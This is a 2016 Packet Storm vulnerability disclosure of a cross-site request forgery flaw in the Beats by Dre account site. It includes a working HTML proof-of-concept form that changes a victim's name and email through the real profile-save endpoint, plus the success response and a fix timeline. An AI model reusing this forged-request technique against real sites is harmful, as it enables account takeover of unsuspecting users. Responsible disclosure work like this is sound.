Beats By Dre Cross Site Request Forgery

2016-07-31T00:00:00
ID PACKETSTORM:138121
Type packetstorm
Reporter Aaditya Purani
Modified 2016-07-31T00:00:00

Description

Hello,
  
I am Aaditya Purani, and I found a CSRF (Cross Site Request Forgery)
on Beats by Dr. Dre which could lead to full account takeover and
information change by just sending a maliciously crafted link to the user.
  
Proof of Concept:  
  
<html>
<!-- CSRF PoC - By Aaditya Purani -->
<body>
<!-- Cross-origin POST to the profile-save endpoint; the victim's browser attaches the session cookie automatically -->
<form method="POST" action="https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer">
<input type="hidden" name="firstName" value="hacked" />
<input type="hidden" name="lastName" value="hackerone" />
<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="phone" value="" />
<!-- csrf_token value as used in the original PoC -->
<input type="hidden" name="csrf_token" value="VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91" />
<input type="hidden" name="isEmailSubscription" value="true" />
<input type="hidden" name="isAlreadySubscribed" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
  
Response:

{"isCustomerSavedSuccessfully": true, "unsubscribeStatus": null} -> Attack
Successful

{"isCustomerSavedSuccessfully": false, "unsubscribeStatus": null} ->
Attack Unsuccessful
  
  
Clicking on this link would change the details of any user. I have written a
complete blog post here:
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/  
  
Video PoC: https://youtu.be/2SfmmWxiDck  
  
Apple has acknowledged me in their Hall of Fame:
https://support.apple.com/en-us/HT201536  
  
*Timeline:*

October 8th 2015 - Reported
October 23rd 2015 - Triaged
November 6th 2015 - Responded that "Matter is being investigated"
January 18th 2016 - Fixed
June 20th 2016 - Acknowledged